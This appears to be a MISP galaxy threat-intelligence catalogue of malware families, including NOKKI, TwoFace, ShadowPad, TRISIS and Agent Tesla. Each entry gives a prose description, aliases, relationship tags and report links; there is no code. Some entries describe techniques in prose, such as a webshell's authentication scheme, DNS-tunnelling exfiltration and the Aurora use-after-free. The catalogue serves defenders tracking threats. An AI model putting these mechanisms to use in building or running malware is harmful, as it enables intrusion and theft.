https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

NOKKI

Beginning in early 2018, Unit 42 observed a series of attacks using a previously unreported malware family, which we have named ‘NOKKI’. The malware in question has ties to a previously reported malware family named KONNI, however, after careful consideration, we believe enough differences are present to introduce a different malware family name. To reflect the close relationship with KONNI, we chose NOKKI, swapping KONNI’s Ns and Ks. Because of code overlap found within both malware families, as well as infrastructure overlap, we believe the threat actors responsible for KONNI are very likely also responsible for NOKKI. Previous reports stated it was likely KONNI had been in use for over three years in multiple campaigns with a heavy interest in the Korean peninsula and surrounding areas. As of this writing, it is not certain if the KONNI or NOKKI operators are related to known adversary groups operating in the regions of interest, although there is evidence of a tenuous relationship with a group known as Reaper.

The tag is: misp-galaxy:tool="NOKKI"

NOKKI has relationships with:

  • similar: misp-galaxy:malpedia="Nokki" with estimative-language:likelihood-probability="almost-certain"

Table 16540. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://www.bleepingcomputer.com/news/security/report-ties-north-korean-attacks-to-new-malware-linked-by-word-macros/

SpyDealer

Recently, Palo Alto Networks researchers discovered an advanced Android malware we’ve named “SpyDealer” which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature. SpyDealer uses exploits from a commercial rooting app to gain root privilege, which enables the subsequent data theft.

The tag is: misp-galaxy:tool="SpyDealer"

Table 16541. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

CowerSnail

CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems.

The tag is: misp-galaxy:tool="CowerSnail"

Table 16542. Table References

Links

https://securelist.com/cowersnail-from-the-creators-of-sambacry/79087/

Svpeng

In mid-July 2017, we found a new modification of the well-known mobile banking malware family Svpeng – Trojan-Banker.AndroidOS.Svpeng.ae. In this modification, the cybercriminals have added new functionality: it now also works as a keylogger, stealing entered text through the use of accessibility services.

The tag is: misp-galaxy:tool="Svpeng"

Svpeng is also known as:

  • trojan-banker.androidos.svpeng.ae

Svpeng has relationships with:

  • similar: misp-galaxy:android="Svpeng" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Svpeng" with estimative-language:likelihood-probability="likely"

Table 16543. Table References

Links

https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/

TwoFace

While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization. The construction of the webshell was interesting by itself, as it was actually two separate webshells: an initial webshell that was responsible for saving and loading the second fully functional webshell. It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server. Due to these two layers, we use the name TwoFace to track this webshell. During our analysis, we extracted the commands executed by the TwoFace webshell from the server logs on the compromised server. Our analysis shows that the commands issued by the threat actor date back to June 2016; this suggests that the actor had access to this shell for almost an entire year. The commands issued show the actor was interested in gathering credentials from the compromised server using the Mimikatz tool. We also saw the attacker using the TwoFace webshell to move laterally through the network by copying itself and other webshells to other servers.

The tag is: misp-galaxy:tool="TwoFace"

TwoFace has relationships with:

  • similar: misp-galaxy:malpedia="TwoFace" with estimative-language:likelihood-probability="almost-certain"

Table 16544. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

IntrudingDivisor

Like TwoFace, the IntrudingDivisor webshell requires the threat actor to authenticate before issuing commands. To authenticate, the actor must provide two pieces of information, first an integer that is divisible by 5473 and a string whose MD5 hash is “9A26A0E7B88940DAA84FC4D5E6C61AD0”. Upon successful authentication, the webshell has a command handler that uses integers within the request to determine the command to execute - To complete

The tag is: misp-galaxy:tool="IntrudingDivisor"

Table 16545. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

JS_POWMET

Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.

The tag is: misp-galaxy:tool="JS_POWMET"

Table 16546. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/

EngineBox Malware

The main malware capabilities include a privilege escalation attempt using MS16-032 exploitation; an HTTP proxy to intercept banking transactions; a backdoor to make it possible for the attacker to issue arbitrary remote commands; and a C&C through an IRC channel. As it’s being identified as a Generic Trojan by most VirusTotal (VT) engines, let's name it EngineBox, the core malware class I saw after reverse engineering it.

The tag is: misp-galaxy:tool="EngineBox Malware"

Table 16547. Table References

Links

https://isc.sans.edu/diary/22736

Joao

Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victim’s computer. To spread their malware, the attackers behind Joao have misused massively-multiplayer online role-playing games (MMORPGs) originally published by Aeria Games. At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.

The tag is: misp-galaxy:tool="Joao"

Joao has relationships with:

  • similar: misp-galaxy:malpedia="Joao" with estimative-language:likelihood-probability="likely"

Table 16548. Table References

Links

https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/

Fireball

Upon execution, Fireball installs a browser hijacker as well as any number of adware programs. Several different sources have linked different indicators of compromise (IOCs) and varied payloads, but a few details remain the same.

The tag is: misp-galaxy:tool="Fireball"

Fireball has relationships with:

  • similar: misp-galaxy:malpedia="Fireball" with estimative-language:likelihood-probability="likely"

Table 16549. Table References

Links

https://www.cylance.com/en_us/blog/threat-spotlight-is-fireball-adware-or-malware.html

ShadowPad

ShadowPad is a modular cyber-attack platform that attackers deploy in victim networks to gain flexible remote control capabilities. The platform is designed to run in two stages. The first stage is a shellcode that was embedded in a legitimate nssock2.dll used by Xshell, Xmanager and other software packages produced by NetSarang. This stage is responsible for connecting to “validation” command and control (C&C) servers and getting configuration information including the location of the real C&C server, which may be unique per victim. The second stage acts as an orchestrator for five main modules responsible for C&C communication, working with the DNS protocol, loading and injecting additional plugins into the memory of other processes.

The tag is: misp-galaxy:tool="ShadowPad"

ShadowPad is also known as:

  • POISONPLUG

  • Barlaiy

ShadowPad has relationships with:

  • similar: misp-galaxy:malpedia="ShadowPad" with estimative-language:likelihood-probability="likely"

Table 16550. Table References

Links

https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf

IoT_reaper

IoT_reaper is fairly large now and is actively expanding. For example, there are multiple C2s we are tracking; the most recent data (October 19) from just one C2 shows that the number of unique active bot IP addresses is more than 10k per day. At the same time, there are millions of potentially vulnerable device IPs being queued into the C2 system, waiting to be processed by an automatic loader that injects malicious code into the devices to expand the size of the botnet.

The tag is: misp-galaxy:tool="IoT_reaper"

Table 16551. Table References

Links

http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/

FormBook

FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016.

The tag is: misp-galaxy:tool="FormBook"

FormBook has relationships with:

  • similar: misp-galaxy:malpedia="Formbook" with estimative-language:likelihood-probability="almost-certain"

Table 16552. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html

https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/

Dimnie

Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.

The tag is: misp-galaxy:tool="Dimnie"

Dimnie has relationships with:

  • similar: misp-galaxy:malpedia="Dimnie" with estimative-language:likelihood-probability="likely"

Table 16553. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/

ALMA Communicator

The ALMA Communicator Trojan is a backdoor Trojan that uses DNS tunneling exclusively to receive commands from the adversary and to exfiltrate data. This Trojan specifically reads in a configuration from the cfg file that was initially created by the Clayslide delivery document. ALMA does not have an internal configuration, so the Trojan does not function without the cfg file created by the delivery document.

The tag is: misp-galaxy:tool="ALMA Communicator"

ALMA Communicator has relationships with:

  • similar: misp-galaxy:malpedia="Alma Communicator" with estimative-language:likelihood-probability="almost-certain"

Table 16554. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/

Silence

In September 2017, we discovered a new targeted attack on financial institutions. Victims are mostly Russian banks, but we also found infected organizations in Malaysia and Armenia. The attackers were using a known but still very effective technique for cybercriminals looking to make money: gaining persistent access to an internal banking network for a long period of time, making video recordings of the day-to-day activity on bank employees’ PCs, learning how things work in their target banks and what software is being used, and then using that knowledge to steal as much money as possible when ready. We saw that technique before in Carbanak and other similar cases worldwide. The infection vector is a spear-phishing email with a malicious attachment. An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims.

The tag is: misp-galaxy:tool="Silence"

Silence has relationships with:

  • similar: misp-galaxy:malpedia="Silence" with estimative-language:likelihood-probability="likely"

Table 16555. Table References

Links

https://securelist.com/the-silence/83009/

Volgmer

Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries. It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer.

The tag is: misp-galaxy:tool="Volgmer"

Volgmer has relationships with:

  • similar: misp-galaxy:mitre-malware="Volgmer - S0180" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="FALLCHILL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"

Table 16556. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA17-318B

Nymaim

Nymaim is a 2-year-old strain of malware most closely associated with ransomware. We have seen recent attacks spreading it using an established email marketing service provider to avoid blacklists and detection tools. But instead of ransomware, the malware is now being used to distribute banking Trojans.

The tag is: misp-galaxy:tool="Nymaim"

Nymaim has relationships with:

  • similar: misp-galaxy:malpedia="Nymaim" with estimative-language:likelihood-probability="likely"

Table 16557. Table References

Links

https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0

GootKit

As was the case earlier, the Gootkit bot is written in NodeJS and is downloaded to a victim computer via a chain of downloaders. The main purpose of the bot also remained the same: to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The tag is: misp-galaxy:tool="GootKit"

GootKit is also known as:

  • Gootkit

GootKit has relationships with:

  • similar: misp-galaxy:malpedia="GootKit" with estimative-language:likelihood-probability="likely"

Table 16558. Table References

Links

https://securelist.com/inside-the-gootkit-cc-server/76433/

https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/

https://securityintelligence.com/gootkit-launches-redirection-attacks-in-the-uk/

https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99

Agent Tesla

Agent Tesla is a modern, powerful keystroke logger. It provides monitoring of your personal computer via keyboard and screenshot capture. Keystrokes, screenshots and registered passwords are sent in a log. You can receive your logs via e-mail, FTP or PHP (web panel).

The tag is: misp-galaxy:tool="Agent Tesla"

Agent Tesla has relationships with:

  • similar: misp-galaxy:malpedia="Agent Tesla" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="Hagga" with estimative-language:likelihood-probability="likely"

Table 16559. Table References

Links

https://www.agenttesla.com/

https://www.bleepingcomputer.com/news/security/zoho-heavily-used-by-keyloggers-to-transmit-stolen-data/

Ordinypt

A new ransomware strain called Ordinypt is currently targeting victims in Germany, but instead of encrypting users' documents, the ransomware rewrites files with random data. Ordinypt is actually a wiper and not ransomware because it does not bother encrypting anything, but just replaces files with random data.

The tag is: misp-galaxy:tool="Ordinypt"

Ordinypt is also known as:

  • HSDFSDCrypt

Ordinypt has relationships with:

  • similar: misp-galaxy:malpedia="Ordinypt" with estimative-language:likelihood-probability="likely"

Table 16560. Table References

Links

https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/

StrongPity2

Detected by ESET as Win32/StrongPity2, this spyware notably resembles one that was attributed to the group called StrongPity.

The tag is: misp-galaxy:tool="StrongPity2"

StrongPity2 is also known as:

  • Win32/StrongPity2

Table 16561. Table References

Links

https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/

wp-vcd

WordPress site owners should be on the lookout for a malware strain tracked as wp-vcd that hides in legitimate WordPress files and that is used to add a secret admin user and grant attackers control over infected sites. The malware was first spotted online over the summer by Italian security researcher Manuel D’Orso. The initial version of this threat was loaded via an include call for the wp-vcd.php file, hence the malware’s name, and injected malicious code into WordPress core files such as functions.php and class.wp.php. This was not a massive campaign, but attacks continued throughout the recent months.

The tag is: misp-galaxy:tool="wp-vcd"

Table 16562. Table References

Links

https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-campaign-is-back/

https://www.bleepingcomputer.com/news/security/wp-vcd-wordpress-malware-spreads-via-nulled-wordpress-themes/

MoneyTaker 5.0

Malicious program for automatic replacement of payment data in AWS CBR

The tag is: misp-galaxy:tool="MoneyTaker 5.0"

Table 16563. Table References

Links

https://www.group-ib.com/blog/moneytaker

Quant Loader

Described as a "professional exe loader / dll dropper", Quant Loader is in fact a very basic trojan downloader. It began being advertised on September 1, 2016 on various Russian underground forums.

The tag is: misp-galaxy:tool="Quant Loader"

Quant Loader has relationships with:

  • similar: misp-galaxy:malpedia="QuantLoader" with estimative-language:likelihood-probability="likely"

Table 16564. Table References

Links

https://www.bleepingcomputer.com/news/security/quant-loader-is-now-bundled-with-other-crappy-malware/

https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground

https://www.bleepingcomputer.com/news/security/worlds-largest-spam-botnet-finds-a-new-way-to-avoid-detection-for-now/

SSHDoor

The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either a hardcoded password or an SSH key.

The tag is: misp-galaxy:tool="SSHDoor"

SSHDoor has relationships with:

  • similar: misp-galaxy:malpedia="SSHDoor" with estimative-language:likelihood-probability="likely"

Table 16565. Table References

Links

https://www.welivesecurity.com/2013/01/24/linux-sshdoor-a-backdoored-ssh-daemon-that-steals-passwords/

TRISIS

(Dragos Inc.) The team identifies this malware as TRISIS because it targets Schneider Electric’s Triconex safety instrumented system (SIS) enabling the replacement of logic in final control elements. TRISIS is highly targeted and likely does not pose an immediate threat to other Schneider Electric customers, let alone other SIS products. (FireEye Inc.) This malware, which we call TRITON, is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. We have not attributed the incident to a threat actor, though we believe the activity is consistent with a nation state preparing for an attack. TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016.

The tag is: misp-galaxy:tool="TRISIS"

TRISIS is also known as:

  • TRITON

Table 16566. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

https://dragos.com/blog/trisis/TRISIS-01.pdf

GratefulPOS

GratefulPOS has the following functions:

  • Access arbitrary processes on the target POS system

  • Scrape track 1 and 2 payment card data from the process(es)

  • Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014, and more recently by Luis Mendieta of Anomali in analysis of a precursor to this sample.

The tag is: misp-galaxy:tool="GratefulPOS"

GratefulPOS has relationships with:

  • similar: misp-galaxy:banker="GratefulPOS" with estimative-language:likelihood-probability="likely"

Table 16568. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season

PRILEX

Prilex malware steals the information of the infected ATM’s users. In this case, it was a Brazilian bank, but consider the implications of such an attack in your region, whether you’re a customer or the bank.

The tag is: misp-galaxy:tool="PRILEX"

PRILEX has relationships with:

  • similar: misp-galaxy:malpedia="Prilex" with estimative-language:likelihood-probability="almost-certain"

Table 16569. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/

CUTLET MAKER

Cutlet Maker is an ATM malware designed to empty the machine of all its banknotes. Interestingly, while its authors have been advertising its sale, their competitors have already cracked the program, allowing anybody to use it for free.

The tag is: misp-galaxy:tool="CUTLET MAKER"

Table 16570. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/

Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants. Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot. The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869. Effectively, this makes Satori an IoT worm, able to spread by itself without the need for separate components.

The tag is: misp-galaxy:tool="Satori"

Satori is also known as:

  • Okiru

Satori has relationships with:

  • similar: misp-galaxy:botnet="Satori" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 16571. Table References

Links

https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/

https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant

PowerSpritz

PowerSpritz is a Windows executable that hides both its legitimate payload and malicious PowerShell command using a non-standard implementation of the already rarely used Spritz encryption algorithm (see the Attribution section for additional analysis of the Spritz implementation). This malicious downloader has been observed being delivered via spearphishing attacks using the TinyCC link shortener service to redirect to likely attacker-controlled servers hosting the malicious PowerSpritz payload.

The tag is: misp-galaxy:tool="PowerSpritz"

PowerSpritz has relationships with:

  • similar: misp-galaxy:malpedia="PowerSpritz" with estimative-language:likelihood-probability="almost-certain"

Table 16572. Table References

Links

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

PowerRatankba

PowerRatankba is used for the same purpose as Ratankba: as a first stage reconnaissance tool and for the deployment of further stage implants on targets that are deemed interesting by the actor. Similar to its predecessor, PowerRatankba utilizes HTTP for its C&C communication.

The tag is: misp-galaxy:tool="PowerRatankba"

PowerRatankba has relationships with:

  • similar: misp-galaxy:malpedia="PowerRatankba" with estimative-language:likelihood-probability="likely"

Table 16573. Table References

Links

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

Ratankba

In one instance we observed, one of the initial malware samples delivered to the victim, RATANKBA, connects to a legitimate but compromised website from which a hack tool (nbt_scan.exe) is also downloaded. The domain also serves as one of the campaign’s platforms for C&C communication. The threat actor uses RATANKBA to survey the lay of the land as it looks into various aspects of the host machine where it was initially downloaded, that is, the machine that has been the victim of the watering hole attack. It collects information such as the running tasks, domain, shares, user information, whether the host has default internet connectivity, and so forth.

The tag is: misp-galaxy:tool="Ratankba"

Ratankba has relationships with:

  • similar: misp-galaxy:malpedia="Ratankba" with estimative-language:likelihood-probability="almost-certain"

Table 16574. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/ratankba-watering-holes-against-enterprises/

USBStealer

USBStealer serves as a network tool that extracts sensitive information from air-gapped networks. We have not seen this component since mid-2015.

The tag is: misp-galaxy:tool="USBStealer"

USBStealer has relationships with:

  • similar: misp-galaxy:mitre-malware="USBStealer - S0136" with estimative-language:likelihood-probability="likely"

Table 16575. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Downdelph

Downdelph is a lightweight downloader developed in the Delphi programming language. As we already mentioned in our white paper, its period of activity was from November 2013 to September 2015 and there have been no new variants seen since.

The tag is: misp-galaxy:tool="Downdelph"

Downdelph has relationships with:

  • similar: misp-galaxy:mitre-malware="Downdelph - S0134" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Downdelph" with estimative-language:likelihood-probability="likely"

Table 16576. Table References

Links

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

CoinMiner

Monero-mining malware

The tag is: misp-galaxy:tool="CoinMiner"

CoinMiner has relationships with:

  • similar: misp-galaxy:malpedia="Monero Miner" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Coinminer" with estimative-language:likelihood-probability="almost-certain"

Table 16577. Table References

Links

https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/

FruitFly

A fully-featured backdoor, designed to perversely spy on Mac users

The tag is: misp-galaxy:tool="FruitFly"

FruitFly has relationships with:

  • similar: misp-galaxy:malpedia="FruitFly" with estimative-language:likelihood-probability="likely"

Table 16578. Table References

Links

https://objective-see.com/blog/blog_0x25.html#FruitFly

MacDownloader

Iranian macOS exfiltration agent, targeting the 'defense industrial base' and human rights advocates.

The tag is: misp-galaxy:tool="MacDownloader"

MacDownloader is also known as:

  • iKitten

MacDownloader has relationships with:

  • similar: misp-galaxy:malpedia="MacDownloader" with estimative-language:likelihood-probability="likely"

Table 16579. Table References

Links

https://objective-see.com/blog/blog_0x25.html#MacDownloader

Empyre

The open-source macOS backdoor, 'Empye', maliciously packaged into a macro’d Word document

The tag is: misp-galaxy:tool="Empyre"

Empyre is also known as:

  • Empye

Table 16580. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Empyre

Proton

A fully-featured macOS backdoor, designed to collect and exfiltrate sensitive user data such as 1Password files, browser login data, and keychains.

The tag is: misp-galaxy:tool="Proton"

Table 16581. Table References

Links

https://objective-see.com/blog/blog_0x25.html#Proton

Mughthesec

Adware which hijacks a macOS user’s homepage to redirect search queries.

The tag is: misp-galaxy:tool="Mughthesec"

Mughthesec has relationships with:

  • similar: misp-galaxy:malpedia="Mughthesec" with estimative-language:likelihood-probability="likely"

Table 16582. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Pwnet

A macOS crypto-currency miner, distributed via a trojaned 'CS-GO' hack.

The tag is: misp-galaxy:tool="Pwnet"

Pwnet has relationships with:

  • similar: misp-galaxy:malpedia="Pwnet" with estimative-language:likelihood-probability="likely"

Table 16583. Table References

Links

https://objective-see.com/blog/blog_0x25.html

CpuMeaner

A macOS crypto-currency mining trojan.

The tag is: misp-galaxy:tool="CpuMeaner"

CpuMeaner has relationships with:

  • similar: misp-galaxy:malpedia="CpuMeaner" with estimative-language:likelihood-probability="likely"

Table 16584. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Travle

The Travle sample found during our investigation was a DLL with a single exported function (MSOProtect). The malware name Travle was chosen given a string found in early samples of this family: “Travle Path Failed!”. This typo was replaced with the correct word “Travel” in newer releases. We believe that Travle could be a successor to the NetTraveler family.

The tag is: misp-galaxy:tool="Travle"

Travle is also known as:

  • PYLOT

Table 16585. Table References

Links

https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/83455/

Digmine

Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends. The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.

The tag is: misp-galaxy:tool="Digmine"

Table 16586. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/

TSCookie

TSCookie itself only serves as a downloader. It expands its functionality by downloading modules from C&C servers. The sample that was examined downloaded a DLL file which has an exfiltration function among many others (hereafter “TSCookieRAT”). Downloaded modules only run in memory.

The tag is: misp-galaxy:tool="TSCookie"

TSCookie has relationships with:

  • similar: misp-galaxy:malpedia="PLEAD (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="PLEAD" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TSCookie" with estimative-language:likelihood-probability="almost-certain"

Table 16587. Table References

Links

http://blog.jpcert.or.jp/.s/2018/03/malware-tscooki-7aa0.html

Exforel

Exforel backdoor malware, VirTool:WinNT/Exforel.A, is a backdoor implemented at the Network Driver Interface Specification (NDIS) level.

The tag is: misp-galaxy:tool="Exforel"

Table 16588. Table References

Links

http://news.softpedia.com/news/Exforel-Backdoor-Implemented-at-NDIS-Level-to-Be-More-Stealthy-Experts-Say-313567.shtml

Rotinom

W32.Rotinom is a worm that spreads by copying itself to removable drives.

The tag is: misp-galaxy:tool="Rotinom"

Table 16589. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-011117-0057-99

Aurora

You probably have heard the recent news about a widespread attack that was carried out using a 0-Day exploit for Internet Explorer as one of the vectors. This exploit is also known as the "Aurora Exploit". The code has recently gone public and it was also added to the Metasploit framework. This exploit was used to deliver a malicious payload, known by the name of Trojan.Hydraq, the main purpose of which was to steal information from the compromised computer and report it back to the attackers. The exploit code makes use of known techniques to exploit a vulnerability that exists in the way Internet Explorer handles a deleted object. The final purpose of the exploit itself is to access an object that was previously deleted, causing the code to reference a memory location over which the attacker has control and in which the attacker dropped his malicious code.

The tag is: misp-galaxy:tool="Aurora"

Aurora is also known as:

  • Hydraq

Aurora has relationships with:

  • similar: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"

Table 16590. Table References

Links

https://www.symantec.com/connect/blogs/trojanhydraq-incident-analysis-aurora-0-day-exploit

https://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back

https://www.symantec.com/connect/blogs/hydraq-attack-mythical-proportions

Cheshire Cat

The oldest Cheshire Cat malware was compiled in 2002. It’s a very old family of malware. The time stamps may be forged, but the malware does have support for very old operating systems. The 2002 implant retrieves a handle for an asr2892 driver that the researchers never got their hands on. It checks for an NE header, which is a header type used before PE headers even existed, and contains references to 16-bit or DOS on a non-9x platform. This malware implant IS REALLY for old systems. The malware is for espionage: it’s very carefully made to stay hidden. Newer versions install as an icon handler shell extension for .lnk files. Shell in this case means the Program Manager, because Windows Explorer was not yet a thing. It sets up COM server objects. It looks like it was written in pure C, but made to look like C++. It is a sensitive implant as well: it checks for all kinds of old MS platforms including Windows NT, Win95, Win98, WinME and more. It checks the patch level as well. A lot of effort was put into adapting this malware to a lot of different operating systems with very granular decision chains.

The tag is: misp-galaxy:tool="Cheshire Cat"

Table 16591. Table References

Links

https://www.youtube.com/watch?v=u2Ry9HTBbZI

https://malware-research.org/prepare-father-of-stuxnet-news-are-coming/

https://www.peerlyst.com/posts/hack-lu-2016-recap-interesting-malware-no-i-m-not-kidding-by-marion-marschalek-claus-cramon

Downloader-FGO

Downloader-FGO is a trojan that comes hidden in malicious programs. Once you install the source (carrier) program, this trojan attempts to gain "root" access (administrator-level access) to your computer without your knowledge.

The tag is: misp-galaxy:tool="Downloader-FGO"

Downloader-FGO is also known as:

  • Win32:Malware-gen

  • Generic30.ASYL (Trojan horse)

  • TR/Agent.84480.85

  • Trojan.Generic.8627031

  • Trojan:Win32/Sisproc

  • SB/Malware

  • Trj/CI.A

  • Mal/Behav-112

  • Trojan.Spuler

  • TROJ_KAZY.SM1

  • Win32/FakePPT_i

Table 16592. Table References

Links

https://www.solvusoft.com/en/malware/trojans/downloader-fgo/

miniFlame

Newly discovered spying malware designed to steal data from infected systems was likely built from the same cyber-weaponry factory that produced two other notorious pieces of cyberespionage software, Flame and Gauss, a security vendor says. Kaspersky Lab released a technical paper Monday outlining the discovery of the malware the vendor has dubbed "miniFlame." While capable of working with Flame and Gauss, miniFlame is a "small, fully functional espionage module designed for data theft and direct access to infected systems," Kaspersky said.

The tag is: misp-galaxy:tool="miniFlame"

Table 16593. Table References

Links

https://securelist.com/miniflame-aka-spe-elvis-and-his-friends-5/31730/

https://www.csoonline.com/article/2132422/malware-cybercrime/cyberespionage-malware--miniflame--discovered.html

GHOTEX

PE_GHOTEX.A-O is a portable executable (PE is the standard executable format for 32-bit Windows files) virus. PE viruses infect executable Windows files by incorporating their code into these files such that they are executed when the infected files are opened.

The tag is: misp-galaxy:tool="GHOTEX"

Table 16594. Table References

Links

https://www.trendmicro.com/vinfo/dk/threat-encyclopedia/archive/malware/pe_ghotex.a-o

Neuron

Neuron consists of both client and server components. The Neuron client and Neuron service are written using the .NET framework with some codebase overlaps. The Neuron client is used to infect victim endpoints and extract sensitive information from local client machines. The Neuron server is used to infect network infrastructure such as mail and web servers, and acts as local Command & Control (C2) for the client component. Establishing a local C2 limits interaction with the target network and remote hosts. It also reduces the log footprint of actor infrastructure and enables client interaction to appear more convincing as the traffic is contained within the target network.

The tag is: misp-galaxy:tool="Neuron"

Neuron has relationships with:

  • similar: misp-galaxy:malpedia="Neuron" with estimative-language:likelihood-probability="likely"

